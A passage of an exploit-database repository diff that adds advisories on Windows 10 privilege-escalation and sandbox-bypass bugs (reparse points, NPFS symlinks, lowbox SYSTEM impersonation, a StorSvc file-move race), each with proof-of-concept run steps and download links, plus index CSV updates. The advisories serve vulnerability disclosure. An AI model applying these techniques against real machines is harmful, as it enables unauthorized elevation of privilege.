+Fall Creator’s Update has introduced a new defined reparse tag, the Global Reparse Point (value 0xA0000019) which I assume is for Silo’s where a symlink can be added into the Silo’s visible namespaces which actually redirects to the global namespace. One user of this is the named pipe file system. It seems that nothing prevents you creating this type of reparse point on an NTFS volume, it doesn’t get checked by the kernel for the sandbox mitigation and because the NTFS driver ignores anything which isn’t a mount point or a ntfs symbolic link it will also not check for the SeCreateSymbolicLinkPrivilege. This symbolic link type works to reparse to any file type so you can create either a file or directory symbolic link. The reparse buffer is basically the same as the normal symbolic link one, but with a different tag. In fact strangely the named pipe file system passes back a buffer with the normal symbolic link tag but with the global reparse tag in the data structure passed back to IopParseDevice.
+
+Outside of the behavior in sandboxes you might want to check that the reparse buffer is correctly verified. Normally the NTFS driver checks the structure of a reparse buffer using FsRtlValidateReparsePointBuffer but that function doesn’t know about the new reparse tag, so you could end up with completely untrusted data being passed into the object manager (NPFS synthesizes the reparse buffer so normally it would be trusted). I’ve not checked if you could trivially BSoD the machine through this approach.
+
+Note that while NTFS symbolic links can be created without privileges in developer mode this bypass also allows a normal user to create them without developer mode being enabled so also acts as an EoP.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. 
+
+1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
+2) Run the poc as Low IL or an in AC passing on the command line the name of the symlink file to create and a target path. For example ‘poc c:\test\hello c:\windows’ will create a symlink ‘hello’ pointing at ‘c:\windows’. Make sure the destination name can be written to as the sandboxed user.
+3) Open the symbolic link as a normal privileged user to see if the reparse target is followed.
+
+Expected Result:
+The creation of the symlink should fail with an error.
+
+Observed Result:
+The symlink is created, is valid and can be used to access the target.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44147.zip

exploits/windows/local/44148.txt

@@ -0,0 +1,38 @@
+Windows: NPFS Symlink Security Feature Bypass/Elevation of Privilege/Dangerous Behavior
+Platform: Windows 10 1709 (functionality not present prior to this version)
+Class: Security Feature Bypass/Elevation of Privilege/Dangerous Behavior
+
+Summary: It’s possible to create NPFS symlinks as a low IL or normal user and the implementation doesn’t behave in a similar manner to other types of Windows symlinks leading to dangerous behavior or EoP.
+
+Description:
+
+Windows 10 1709 introduced a new symlink feature to NPFS which is accessible from a FSCTL. From what I can see the implementation has a number of security issues which concern me:
+
+1) Creation of symbolic links is only limited to a user which can open the root named pipe device. I.e. \Device\NamedPipe. This users which can open the device includes restricted tokens with the RESTRICTED SID and Low IL tokens.
+2) Accessing a symlink results in the NPFS driver synthesizing a NTFS symlink reparse point which is passed back to the object manager. This allows the symlink to reparse to different devices. This is presumably by design but it’s dangerous behavior.
+3) Opening a symlink doesn’t respect the FILE_OPEN_REPARSE_POINT which could lead to some unusual behavior.
+
+The fact that you can create the symlink as a lower privileged user is bad enough, although I don’t believe it can be done from an AC so maybe you don’t care about it. But the other two issues are examples of dangerous behavior which _will_ come back to bite you at some point in the future.
+
+Let’s take point 2 as an example, up to this point NPFS hasn’t had the concept of symbolic links. Sure you could drop an appropriate object manager symlink somewhere and get a caller to follow it but you’d need to be able to influence the callers path or their DOS device directory. With this if a privileged caller is expecting to open a named pipe, say \\.\pipe\ABC then ABC could actually be a symbolic link to a normal file. If the caller then just writes data to the pipe expecting it to be a stream they could actually be writing data into a file which might result in EoP. Basically I see it’s a case of when not if that a EoP bug is found which abuses this behavior. 
+
+Also, there’s no way I know of for detecting you’re opening a symbolic link. For example if you open the target with the FILE_OPEN_REPARSE_POINT flag it continues to do the reparse operation. Due to creating a normal NTFS symbolic link this might also have weird behavior when a remote system accessed a named pipe, although I’ve not tested that. 
+
+Overall I think the behavior of the implementation has the potential for malicious use and should be limited to privileged users. I don’t know it’s original purpose, perhaps it’s related to Silos (there is a flag to make a global symlink) or it’s to make it easier to implement named pipes in WSL, I don’t know. If the purpose is just to symlink between named pipes then perhaps only allow a caller to specify the name relative to the NPFS device rather than allowing a full object path.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. The PoC will create a symlink called ABC which points to notepad.exe. It will check the file file it opens via the symlink matches the file opened directly.
+
+1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
+2) Run the poc as Low IL (using say psexec).
+
+Expected Result:
+The creation of the symlink should fail with an error.
+
+Observed Result:
+The symlink is created, is valid and the poc printed ‘Success’ as it’s opened the copy of notepad.exe via the symlink.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44148.zip

exploits/windows/local/44149.txt

@@ -0,0 +1,38 @@
+Windows: Constrained Impersonation Capability EoP
+Platform: Windows 10 1703/1709 (not tested earlier versions)
+Class: Elevation of Privilege
+
+Summary: It’s possible to use the constrained impersonation capability added in Windows 10 to impersonate a lowbox SYSTEM token leading to EoP.
+
+Description:
+
+Windows 10 added a new security check during impersonation of a token which relies on an AppContainer capability Constrained Impersonation which allows a LowBox process to impersonate another LowBox token, even if it’s for a different user, as long as it meets certain requirements. Specifically:
+
+- The impersonation token’s session ID is the same as the current process’ session ID
+- The impersonation token has the same AC package SID as the process’
+- The impersonation token’s capability sids are a subset of the processes
+
+I’d assume that the thoughts around the security of this constrained impersonation capability is preventing an exist lowbox process gaining that capability. However this can be abused from a normal user privilege level by creating a new AC process with the capability. As a normal user it’s possible to create a new lowbox token from an existing one which has any capabilities you like and the package SID can be arbitrary. 
+
+The only limiting factor is getting hold of a suitable token which has the same session ID. This is easy for example in UAC scenarios (including OTS elevation) but of course that’s a UAC bypass. There’s various tricks to get a SYSTEM token but most of the services run in Session 0. However there are a few processes running as SYSTEM but in the same session on a default install of Windows including CSRSS and Winlogon. There’s also the consent process which is part of UAC which is spawned in the user session. Therefore one way to get the token is to try and elevate a process running on a WebDAV share (hosted on localhost) and negotiate the NTLM/Negotiate auth in a similar way to previous issues I’ve reported (e.g. cases 21243 and 21878).
+
+With a SYSTEM token handle it’s now possible to impersonate it as a lowbox from a normal user account. Of course this isn’t a direct privilege escalation as you can’t access administrator resources, however you can find system services which do the wrong thing. One example is code which just checks the Authentication ID of the token and assumes if it’s the SYSTEM ID then it’s trusted. A second example are AC processes which either run as SYSTEM or have tried to lock down themselves, a good example is the UMFD process, resources created by this process have access to SYSTEM as well as the package SID so you could inject code through hijacking a thread or one of the processes named resources. The final example are services which increase the IL of the caller, such as the print spooler bug I reported in case 41850, which you could get an arbitrary write as SYSTEM which gives you direct EoP.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It implements a WebDAV server on localhost which will require authentication. Any user which tries to open a file on the share will have its token captured. It then uses UAC consent to get a call to the WebDAV server as a system token in the current session. Note that although I’m abusing UAC it’s not a UAC bypass, it’s just a convenient way of getting the token. This would still work in OTS UAC as the token happens before the process is actually executed (which means the password doesn’t have to be entered) so it’s still an issue. Once a suitable token has been captured the PoC spawns a new process in an AC and impersonates the system token on the main thread. It then abuses some functionality which was “fixed” in MS15-10, that it’s possible to open a service with SERVICE_STATUS access rights as long as the caller is SYSTEM. Admittedly this seemed to be a bogus fix as impersonation shouldn’t work like that in RPC, but in this case it doesn’t really matter as we can actually impersonate a SYSTEM token. The PoC stops at the point of getting a valid handle to the service, I’ve not worked out what you can usefully do with that handle, maybe start/stop a service you wouldn’t normally be able to?
+
+1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
+2) In an admin command prompt run the command “netsh http add urlacl url=http://127.0.0.1:4444/WebDAV user=Everyone” this is to just allow the PoC to use the HttpListener class which saves me from writing my own HTTP server implementation. You could do it entirely manually and not require this step but it’s just an issue with the  listener classes that you need to add an acl for it, I was just too lazy to write my own.
+3) Run the NtlmAuth PoC, it should setup the WebDAV server, start the WebClient service and then start an UAC elevation on the WebDAV server to capture the token. It’ll then run the test binary to open the service.
+4) Cancel the UAC elevation prompt. You should now see a message box on the desktop from the test binary saying Success.
+
+Expected Result:
+Impersonating the SYSTEM token in a LowBox shouldn’t be possible.
+
+Observed Result:
+The test binary is running while impersonating the SYSTEM token. It’s opened a handle to the WebClient service with SERVICE_STATUS access rights.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44149.zip

exploits/windows/local/44152.txt

@@ -0,0 +1,32 @@
+Windows: StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation EoP
+Platform: Windows 10 1709 (not tested earlier versions)
+Class: Elevation of Privilege
+
+Summary: The SvcMoveFileInheritSecurity RPC method in StorSvc can be used to move an arbitrary file to an arbitrary location resulting in elevation of privilege.
+
+Description:
+
+I was reading Clément Rouault & Thomas Imbert excellent PacSec’s slides on ALPC+RPC issues and they highlighted the SvcMoveFileInheritSecurity method used to exploit the ALPC bug CVE-2017-11783. The function impersonates the user and calls MoveFileEx to move the file to a new destination, then reverts the impersonation and tries to reset the security descriptor of the new file so that it matches the inheritable permissions. The ALPC bug in CVE-2017-11783 has apparently been fixed but the behavior of the SvcMoveFileInheritSecurity has not been modified as far as I can tell.
+
+The main problem occurs if the call to SetNamedSecurityInfo fails, in that case the code tries to move the file back to its original location, however it does reassert the impersonation. This probably makes sense because it’s possible to have a file/directory which you can open for DELETE but without the rights to create a new file in the same directory. In the case the original move would succeed but the revert would fail. However there’s a TOCTOU issue in that the original path might have been replaced with a mount point which redirects the revert to a totally arbitrary location while running at SYSTEM. The exploit controls both the name and the contents of the file so this would be a trivial privilege escalation.
+
+It’s possible to cause SetNamedSecurityInfo to fail just by adding a Deny ACE to the file for SYSTEM. This will cause the function to get ERROR_ACCESS_DENIED and the revert will take place. By placing an oplock on the original file open we can switch in a mount point and always win the race condition.
+
+Ideally all operations should take place under user impersonation, but if that was the case there’d be no point in doing it in a SYSTEM service to begin with. Note that there’s a second issue specifically with SetNamedSecurityInfo which I’ve sent as a separate issue, just in case it gets missed.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C++ project. It will abuse the SvcMoveFileInheritSecurity method to create the file test.txt in the windows folder.
+
+1) Compile the C++ project.
+2) Execute the PoC as a normal user.
+
+Expected Result:
+The file reversion fails trying to copy the file back to its original location.
+
+Observed Result:
+The file is reverted which results in the test.txt file being creating in c:\windows.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44152.zip

files_exploits.csv

@@ -3832,7 +3832,7 @@ id,file,description,date,author,type,platform,port
 30413,exploits/windows/dos/30413.py,"PotPlayer 1.5.40688 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,dos,windows,
 31464,exploits/windows/dos/31464.pl,"Surgemail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",dos,windows,
 30414,exploits/windows/dos/30414.py,"GOM Player 2.2.56.5158 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,dos,windows,
-30422,exploits/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - '.wav' Integer Division by Zero",2013-12-22,"Osanda Malith",dos,windows,
+30422,exploits/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - '.wav' Integer Division by Zero",2013-12-22,"Osanda Malith Jayathissa",dos,windows,
 30430,exploits/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",dos,linux,
 30444,exploits/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",dos,linux,
 30455,exploits/windows/dos/30455.txt,"Microsoft Internet Explorer 6 - Position:Relative Denial of Service",2007-08-07,Hamachiya2,dos,windows,
@@ -3856,7 +3856,7 @@ id,file,description,date,author,type,platform,port
 30540,exploits/multiple/dos/30540.txt,"Blizzard Entertainment StarCraft Brood War 1.15.1 - Minimap Preview Remote Denial of Service",2007-08-28,"Gynvael Coldwind",dos,multiple,
 30542,exploits/linux/dos/30542.txt,"EnterpriseDB Advanced Server 8.2 - Uninitialized Pointer",2007-08-29,"Joxean Koret",dos,linux,
 30544,exploits/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service",2007-08-29,SlicK,dos,windows,
-30550,exploits/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith",dos,windows,
+30550,exploits/windows/dos/30550.php,"Ofilter Player 1.1 - '.wav' Integer Division by Zero",2013-12-28,"Osanda Malith Jayathissa",dos,windows,
 30566,exploits/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",dos,multiple,
 30574,exploits/multiple/dos/30574.txt,"CellFactor REvolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",dos,multiple,
 30578,exploits/linux/dos/30578.txt,"MPlayer 1.0 - AVIHeader.C Heap Buffer Overflow",2007-09-12,"Code Audit Labs",dos,linux,
@@ -4234,7 +4234,7 @@ id,file,description,date,author,type,platform,port
 33328,exploits/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",dos,hardware,
 33332,exploits/windows/dos/33332.py,"JetAudio 8.1.1 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",dos,windows,
 33335,exploits/windows/dos/33335.py,"GOM Player 2.2.57.5189 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",dos,windows,
-33384,exploits/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",dos,windows,
+33384,exploits/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith Jayathissa",dos,windows,
 33386,exploits/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,dos,multiple,
 33397,exploits/linux/dos/33397.txt,"MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service",2009-11-23,"Shane Bester",dos,linux,
 33398,exploits/linux/dos/33398.txt,"MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service",2009-11-23,"Shane Bester",dos,linux,
@@ -4275,7 +4275,7 @@ id,file,description,date,author,type,platform,port
 33729,exploits/multiple/dos/33729.txt,"PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service",2014-06-13,"Bernt Marius Johnsen",dos,multiple,
 33733,exploits/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",dos,windows,
 33735,exploits/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",dos,multiple,
-33737,exploits/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith",dos,hardware,
+33737,exploits/hardware/dos/33737.py,"ZTE / TP-Link RomPager - Denial of Service",2014-06-13,"Osanda Malith Jayathissa",dos,hardware,
 33755,exploits/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",dos,php,
 33770,exploits/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,dos,windows,
 33775,exploits/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,dos,windows,
@@ -4471,7 +4471,7 @@ id,file,description,date,author,type,platform,port
 35856,exploits/multiple/dos/35856.html,"Opera Web Browser 11.11 - Denial of Service",2011-06-14,echo,dos,multiple,
 35859,exploits/hardware/dos/35859.py,"Zhone GPON 2520 R4.0.2.566b - Crash (PoC)",2015-01-21,"Kaczinski Ramirez",dos,hardware,
 35869,exploits/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",dos,windows,
-35870,exploits/windows/dos/35870.rb,"Exif Pilot 4.7.2 - Buffer Overflow (SEH)",2015-01-22,"Osanda Malith",dos,windows,
+35870,exploits/windows/dos/35870.rb,"Exif Pilot 4.7.2 - Buffer Overflow (SEH)",2015-01-22,"Osanda Malith Jayathissa",dos,windows,
 35873,exploits/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial of Service",2011-06-17,rouli,dos,windows,
 35876,exploits/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",dos,windows,
 35889,exploits/windows/dos/35889.py,"IceCream Ebook Reader 1.41 - Crash (PoC)",2015-01-23,"Kapil Soni",dos,windows,
@@ -4970,7 +4970,7 @@ id,file,description,date,author,type,platform,port
 39325,exploits/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple,
 39326,exploits/multiple/dos/39326.txt,"Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple,
 39327,exploits/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Out-of-Bounds Read",2016-01-26,"Google Security Research",dos,multiple,
-39329,exploits/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow (PoC)",2014-05-25,"Osanda Malith",dos,windows,
+39329,exploits/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow (PoC)",2014-05-25,"Osanda Malith Jayathissa",dos,windows,
 39330,exploits/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",dos,windows,
 39331,exploits/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,dos,windows,
 39353,exploits/windows/dos/39353.txt,"VideoLAN VLC Media Player 2.2.1 - '.mp4' Heap Memory Corruption",2016-01-28,"Francis Provencher",dos,windows,
@@ -5159,7 +5159,7 @@ id,file,description,date,author,type,platform,port
 39861,exploits/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Overread",2016-05-26,"Google Security Research",dos,multiple,
 39862,exploits/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Overread",2016-05-26,"Google Security Research",dos,multiple,
 39863,exploits/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Out-of-Bounds Reads",2016-05-26,"Google Security Research",dos,multiple,
-39867,exploits/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",dos,multiple,
+39867,exploits/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith Jayathissa",dos,multiple,
 39873,exploits/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux,
 39875,exploits/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",dos,linux,
 39877,exploits/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",dos,multiple,
@@ -5867,6 +5867,8 @@ id,file,description,date,author,type,platform,port
 43327,exploits/macos/dos/43327.c,"Apple macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig",2017-12-12,"Google Security Research",dos,macos,
 43328,exploits/multiple/dos/43328.c,"Apple macOS/iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling",2017-12-12,"Google Security Research",dos,multiple,
 43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
+44146,exploits/windows/dos/44146.cpp,"Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure",2018-02-20,"Google Security Research",dos,windows,
+44153,exploits/windows/dos/44153.html,"Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free",2018-02-20,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -8848,7 +8850,7 @@ id,file,description,date,author,type,platform,port
 35811,exploits/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - User Profile Service Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",local,windows,
 35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows,
 35813,exploits/windows/local/35813.py,"Congstar Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows,
-35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Local Stack Buffer Overflow",2015-01-16,"Osanda Malith",local,windows,
+35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Local Stack Buffer Overflow",2015-01-16,"Osanda Malith Jayathissa",local,windows,
 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows,
 35994,exploits/windows/local/35994.c,"BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows,
 35847,exploits/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",local,osx,
@@ -9524,6 +9526,11 @@ id,file,description,date,author,type,platform,port
 43248,exploits/macos/local/43248.md,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation",2017-11-28,Lemiorhan,local,macos,
 43331,exploits/linux/local/43331.txt,"GNU C Library Dynamic Loader glibc ld.so - Memory Leak / Buffer Overflow",2017-12-13,"Qualys Corporation",local,linux,
 43345,exploits/linux/local/43345.c,"Linux kernel < 4.10.15 - Race Condition Privilege Escalation",2017-12-15,anonymous,local,linux,
+44147,exploits/windows/local/44147.txt,"Microsoft Windows - Global Reparse Point Security Feature Bypass/Elevation of Privilege",2018-02-20,"Google Security Research",local,windows,
+44148,exploits/windows/local/44148.txt,"Microsoft Windows - NPFS Symlink Security Feature Bypass/Elevation of Privilege/Dangerous Behavior",2018-02-20,"Google Security Research",local,windows,
+44149,exploits/windows/local/44149.txt,"Microsoft Windows - Constrained Impersonation Capability Privilege Escalation",2018-02-20,"Google Security Research",local,windows,
+44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,
+44152,exploits/windows/local/44152.txt,"Microsoft Windows - StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation Privilege Escalation",2018-02-20,"Google Security Research",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16237,6 +16244,7 @@ id,file,description,date,author,type,platform,port
 43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - 'Login' Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows,
 43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php,
 43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Root Remote Code Execution",2017-12-14,"Philip Pettersson",remote,hardware,
+44151,exploits/multiple/remote/44151.txt,"utorrent - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -33537,7 +33545,7 @@ id,file,description,date,author,type,platform,port
 33795,exploits/php/webapps/33795.txt,"Joomla! Component com_aml_2 - 'art' SQL Injection",2010-03-23,Metropolis,webapps,php,
 33796,exploits/php/webapps/33796.txt,"Joomla! Component com_cb - 'cat' SQL Injection",2010-03-23,"DevilZ TM",webapps,php,
 33797,exploits/php/webapps/33797.txt,"Joomla! Component com_jresearch - 'Controller' Local File Inclusion",2010-03-24,"Chip d3 bi0s",webapps,php,
-33803,exploits/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",webapps,hardware,
+33803,exploits/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith Jayathissa",webapps,hardware,
 34141,exploits/php/webapps/34141.txt,"AneCMS 1.x - '/modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",webapps,php,
 33976,exploits/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",webapps,php,
 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,
@@ -33733,7 +33741,7 @@ id,file,description,date,author,type,platform,port
 34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",webapps,multiple,
 34166,exploits/php/webapps/34166.txt,"KubeSupport - 'lang' SQL Injection",2010-06-18,"L0rd CrusAd3r",webapps,php,
 34168,exploits/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,webapps,php,80
-34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",webapps,php,
+34169,exploits/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith Jayathissa",webapps,php,
 34170,exploits/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",webapps,php,
 34173,exploits/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",webapps,php,
 34175,exploits/php/webapps/34175.txt,"SaffaTunes CMS - 'news.php' Multiple SQL Injections",2010-06-21,"Th3 RDX",webapps,php,
@@ -37512,7 +37520,7 @@ id,file,description,date,author,type,platform,port
 41028,exploits/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php,
 41029,exploits/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php,
 41032,exploits/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' SQL Injection",2017-01-11,v3n0m,webapps,php,
-41033,exploits/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",webapps,hardware,
+41033,exploits/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith Jayathissa",webapps,hardware,
 41034,exploits/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php,
 41036,exploits/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php,
 41037,exploits/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php,
@@ -38273,7 +38281,7 @@ id,file,description,date,author,type,platform,port
 41988,exploits/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",webapps,php,8080
 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,
 41990,exploits/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,webapps,php,
-41997,exploits/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",webapps,php,
+41997,exploits/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith Jayathissa",webapps,php,
 41998,exploits/hardware/webapps/41998.txt,"Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion",2017-05-02,ReverseBrain,webapps,hardware,
 42003,exploits/php/webapps/42003.txt,"PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",webapps,php,80
 42004,exploits/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,webapps,php,

files_shellcodes.csv

@@ -732,8 +732,8 @@ id,file,description,date,author,type,platform
